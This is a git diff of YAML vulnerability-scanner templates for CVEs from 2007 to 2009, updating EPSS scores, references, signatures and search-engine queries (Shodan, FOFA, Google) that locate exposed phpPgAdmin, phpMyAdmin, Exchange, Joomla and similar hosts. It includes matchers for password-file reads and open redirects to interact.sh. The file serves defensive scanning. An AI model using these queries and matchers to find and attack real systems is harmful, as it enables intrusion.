cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: cve2007,cve,xss,pgadmin,phppgadmin,edb http: @@ -52,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022070fd863c2346a1262a1c6a87c2bf86b8a29a953f0bb6e8e24b6988aef07dcdde022100de1eb0f49138ab29c4ba04a2020fb9075ad7b3e9c9f82629d21eee375c325b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100953dd54d966440da191127014e76b95981750331f9e3cae028138f6ab2d282e2022020180747ba4e68e033bb63c310e7a3b785f2b329d481c0168ae14b3078ba3027:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index b395ef595b..c7bc9d6f7e 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -22,14 +22,13 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00663 - epss-percentile: 0.77516 + epss-percentile: 0.7961 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wordpress - product: sniplets_plugin + product: "sniplets_plugin" tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets - flow: http(1) && http(2) http: @@ -63,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220330d8282048986ad674ffabf575c5c526bea21d888f71c7a3269291cfb5611f002201f866680d220a7d5c2de7d32f2b9df9047a2b46b72a38c5c49c22fefca690aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 95335e8942..5331f3db50 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -28,7 +28,15 @@ info: max-request: 2 vendor: microsoft product: exchange_server - shodan-query: http.title:"Outlook" + shodan-query: + - http.title:"Outlook" + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 + google-query: intitle:"outlook" tags: cve2008,cve,redirect,owa,exchange,microsoft http: @@ -43,4 +51,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adb698e8a7df0b652e70fc7ce8dee9cd47911b4491e600b4315c4fc54d7e35290221008a66a93ed217d258e21cbd4121243d454487a5284fab8a50e16829c4916d71f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 28a0666dd5..005162de9f 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -28,6 +28,7 @@ info: max-request: 1 vendor: cmsimple product: cmsimple + shodan-query: cpe:"cpe:2.3:a:cmsimple:cmsimple" tags: cve,cve2008,lfi,cmsimple http: @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003b63e7cd7ab09897735b1866b0ce2b3aedc493e01965112604d9981a58d09fe02200db2d75ecbfa5669fc8cc988fcf93ee338fa4d396b07f4d60bb219df3cd58bc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 0bce7f19c4..5b784a3beb 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5 cve-id: CVE-2008-4764 cwe-id: CWE-22 - epss-score: 0.02365 - epss-percentile: 0.89577 + epss-score: 0.02135 + epss-percentile: 0.89239 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083dfc3a90c4bb3aaa2d1d85bd0eb23154e4019210fc591e51f0bded1afc7a70202205d2c129a1bb23b903372e64284d8830eabe2e9eb96e0eb5afa05c6d444afc686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 90bcd16ae0..8782704ff4 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -21,13 +21,18 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88625 + epss-percentile: 0.89734 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin - shodan-query: http.title:"phpPgAdmin" + shodan-query: + - http.title:"phpPgAdmin" + - http.title:phppgadmin + - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb http: @@ -44,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f87c132a84be464e4ff4d2f737508ae0e9b62dd9ee5325ac51ea7797fd09b2ff022100b54e03be142a263440bb6e10c71884a056400c7224422ad9e395c17f30de84d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index cf7fc02a6b..832d03e02f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.03314 - epss-percentile: 0.90395 + epss-percentile: 0.9132 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ae540f2d6cbc68c64570307fdf0bdf36a2b7acd80b4eee7f37e87fe1a215408022001a5e8067cb4740653e558dcafa619df1481f916f8dddb073b404630e6703a24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100880770c9a32ddd553b05d2f87d9b1b190a6c3a88dfa481015ce830ac8d7f2088022073a2283b069da137fa2a4d8f3b411949d3f0d45110008d393a0cf2862f3cb013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 4ae86e833b..f9c097ff68 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00509 - epss-percentile: 0.76096 + epss-percentile: 0.76498 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb9dc7da389c238f3d1f51bb8eb60df5e0b9eb7c3e2613a47e3d8535a0cd36050220650d1c196b18deeb192b1c50fdffed8b36fd4412bac34a17359e495325382166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index b7f61b6a45..13e2bf3692 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -13,13 +13,14 @@ info: - https://www.exploit-db.com/exploits/6980 - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - epss-score: 0.01029 - epss-percentile: 0.82175 + epss-score: 0.01302 + epss-percentile: 0.85861 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a6b3c7843f9b11700d264ebe9e7d62ab4a3218e9f4b692e8ebb15b025cb36a70221008873d32a32de8df6cd215ab066f2fb7847612833f7b326d8d4cc071bbc0a043a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085ba6f15c447dffc76deb881a79fa4f92f8beb9255635e3a753f2cffcfc1dbbd022100d607c5f2aeba0c92069b3518cab335995771aa173ec4a1ed40c49cec8b43ec58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 76631b2aac..0091d9c745 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -29,7 +29,16 @@ info: max-request: 1 vendor: parallels product: h-sphere - shodan-query: title:"Parallels H-Sphere + shodan-query: + - title:"Parallels H-Sphere + - http.title:"h-sphere" + - http.title:"parallels h-sphere" + fofa-query: + - title="h-sphere" + - title="parallels h-sphere" + google-query: + - intitle:"h-sphere" + - intitle:"parallels h-sphere" tags: cve,cve2008,xss,parallels,h-sphere http: @@ -54,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f5d9bbda9c856d7eac18bbe866eb3249138a90a0b6b072b3cb11cd24f4afb7102201d8c97f30783c811f77802a6f6e66471e8bc85afe7df1a619f756c7437dba8e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 0d5751fe14..b1e76a79a3 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.71607 + epss-percentile: 0.72128 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093d53a44e7670ae91340f32f011a1cf3d1a356b259d38839794f5af89b77d20802200ece4f4130a9a1e17e778ea393395611a46cc9af56a222985f4e148afc9159e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 384346aaaf..7d896efb1b 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -15,13 +15,14 @@ info: - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.70097 + epss-percentile: 0.72879 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true @@ -50,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100930ae1e3a335eff7b78c478fd3c7f1177b65130a6d6b2b00ff6507a2c29d87900220537ba82e9274860321609d107916524e805cd669e6949ae5fce2998f92e135f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027a8cf1c11d0200d01ff1f3ec4cadaca8a477a1e053fc1989ecd7709dd0d0d9e022069a08c26d868ec16a203e0942b4ceb19bf20865148cc26f5a82e14c37ed74d5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 8eaf2fb274..f60e74f353 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -17,15 +17,18 @@ info: cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 - epss-score: 0.01425 - epss-percentile: 0.86241 + epss-score: 0.01544 + epss-percentile: 0.87118 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: boka product: siteengine - shodan-query: html:"SiteEngine" + shodan-query: + - html:"SiteEngine" + - http.html:"siteengine" + fofa-query: body="siteengine" tags: cve,cve2008,redirect,siteengine,boka http: @@ -38,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cfd3ce47bdd3c6cbf2fdd81c29180bd8f8f05e9b31f1d8f0c7a02b9d2ed0f52022100f8e324955cf0e9c6d7a0de24bcde29fd750c959594a8b5b8f600c7d5b999d232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index f6f14d1199..38d58ade0c 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.97081 - epss-percentile: 0.99755 + epss-percentile: 0.99771 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell product: zeroshell + shodan-query: http.title:"zeroshell" + fofa-query: title="zeroshell" + google-query: intitle:"zeroshell" tags: cve,cve2009,edb,zeroshell,kerbynet,rce http: @@ -39,4 +42,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086897c4a89ba3180b412adb9e2515a6dc81be03c34ce7b8c4f7059efc87adb38022075f0afa4057f34ad3b734c8a7d4fcd6fb8c7adf9ff68351baf948f2ecce764bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 4c4a3f433d..24bc9aaba4 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.919 + epss-percentile: 0.92091 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220752ee73ce2196cc54c39a5e60377c58c87e7ef7ef489fd990d2b463b6ddd900402204885ac378662f0bf728920184aab940b6d54ebdb022e1767ebc9b7e4283d8ad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edfe0bfde8e2accddd711cbcb56d79be3056b26669bafe2f3b6cb9a91913a64002202d6da59dfba62472076866b6bd692f3639a1ffade4e7b4445cc2e3e12db22ebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index b874ede337..9439094c23 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -20,13 +20,22 @@ info: cvss-score: 7.5 cve-id: CVE-2009-1151 cwe-id: CWE-94 - epss-score: 0.79256 - epss-percentile: 0.98197 + epss-score: 0.79939 + epss-percentile: 0.983 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce http: @@ -49,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d034c615116d4e4388066b8ecd70006fb486a97f1893f14acdd83c4b1d48a2ec02200b87edb8aa8815371b589ebc0773ca1f591ef511e9f6dfb2c4a6bdc6cfc624f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100a8d6e9a49ac8d0da85dbed87672790d2f8a014822675fe55570c8d0bc2210b48021f211085a76ddc4b59e7fdd55ab10f9a08177239563572624260f092f88fb0d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 7cfccf1119..b788da8d29 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2009-1496 cwe-id: CWE-22 - epss-score: 0.00802 - epss-percentile: 0.81288 + epss-score: 0.01134 + epss-percentile: 0.84662 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220058c6301672453287635b209959b9ac18463e075a84677673e28deef2283f91a0221009ef0ec653e81bc72e2c7d58deff90a7f85cba1e35851c7a2ae9f20d1d9ff24d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f025736c4a522bd94ac5a9ecea90933348c2449f39cbff870c610fd6007e3aa02203ab7631a7d49d49ddcdcaee2eeae6f0a871096742f54d72499cbc2be9077874f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index fdad6c137f..8e4de816ec 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -28,7 +28,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" + google-query: intitle:"coldfusion administrator login" tags: cve2009,cve,adobe,xss,coldfusion,tenable http: @@ -51,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099e04590b72f5f59dff9760d627e7042601a45b16bea2c23852fa76186fae5ab0220361a0788e7674d6ed82b5e924aace4e3d604f237ac2666fa79b1e91830fd2e1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207abc6420788f38cdf43dd960af68f3052a5eb599b29f3002f9f9067ebc6882ae0220552bfc0a0397fe0f49a889b8aa4cecc89dbc714e016aaff5c69a8122a4734264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 68f9595bb0..6f8dab2a39 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2009-2100 cwe-id: CWE-22 - epss-score: 0.00779 - epss-percentile: 0.80973 + epss-score: 0.02365 + epss-percentile: 0.89809 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220011b812bacaed12772d45c7485d04136e35b9196b4c435b488601681c7bb3be50220722ab9dd33d98de09bfaec078bfd702692da5772714e412426ee37084ac9b862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100868c8dad66aea364683d9a4e38139c1e040c1cb3b792e827191f2b16824d29ea0220642e61d2850862c9a2dc3795c395d80f33aa951bcfc657a88eec1aa9cf9a1c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 4ab40ddac3..e38cbd12d9 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2009-3318 cwe-id: CWE-22 - epss-score: 0.00706 - epss-percentile: 0.79951 + epss-score: 0.01062 + epss-percentile: 0.84107 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bc8b6fb22e490512109118ecf32279b8742eb0391a184c91700c91da8b4591eb022100c82312184befa6261e4804c856191e828d49e06fd6f09184837202906a4f1d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ae69089dedcbf57111b3c504146d466dfe72254c0dd6fc4e377fe1d00b5ffec02200249cdd3548781a034d4e37670e19c65011269b24a6d1e24b2347a071823c5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 303920760a..acf996263a 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -14,18 +14,24 @@ info: - http://www.vupen.com/english/advisories/2009/1494 - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - http://www.exploit-db.com/exploits/8870 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2009-4202 cwe-id: CWE-22 - epss-score: 0.01956 - epss-percentile: 0.87449 + epss-score: 0.01917 + epss-percentile: 0.88567 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" tags: cve,cve2009,joomla,lfi,photo,edb http: @@ -42,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c777774f99408aa53f9024ed173c4b5f653295367409e9b42c256336d3a3ad4022100ea93147fd00a0eba5c9c1ff6e8a48bba81f4df36c20ecf450a8a67a0b887c5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044fc59647921ae246b7de0555de2a1c11877a783041099b578b92e397a07c79d022021f6a35647edd8212110c1017e4960dd601614859682c69173f2c6dcca9173ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 22f0057f54..f60b8f63e8 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.00611 - epss-percentile: 0.764 + epss-percentile: 0.78606 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b7331565010d84c002b7cf2f7a86ffaad9ed7987a6af7ed386d0c1fdfc4a2870022100ad93d7312e808e09e1bafe8a62c52b228ef426c7d5a7dcce76a2d12acb50c0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9c3e6842d7f2bd870dfaccb44cf7967e101052b3c7d1f03127000e7910fae26022100de227729def8c5184e4407e309b448a502c7ee7eb2d00d96cbd5ee0dd88a864d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index eaeb45c307..aedfce43ac 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -11,18 +11,20 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - http://awstats.sourceforge.net/docs/awstats_changelog.txt + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2009-5020 cwe-id: CWE-20 - epss-score: 0.00215 - epss-percentile: 0.59474 + epss-score: 0.00253 + epss-percentile: 0.65112 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: awstats product: awstats + shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" tags: cve2009,cve,redirect,awstats http: @@ -37,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e3ee0cfc04525ca64e6f63073fa38f5db6ee44776907c68d8f5e190a19649a9a022100c21acec79450886ccc34a6c7737411102d641536ee3d33788522fb5fd5cf6f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb00fd3c4ce5a26ed6ab80d774267c399a5e2335eea586b3738ef156824058df022066feb85d7c51ff28bc5fbfaf7b0223531b5ec997f1dbcac45c0bdfefb62af202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index cc83c7f706..8921da3f7b 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 - epss-score: 0.01329 - epss-percentile: 0.85735 + epss-score: 0.01077 + epss-percentile: 0.84241 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f1bc3fae0095bf323e677c3c93b6cdb42d839f3084ee12f9fe92a0dab609269022100b70a69e966f2e410ba5d8ed821edf339feb20ee4149b37bd66992153e4a341ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 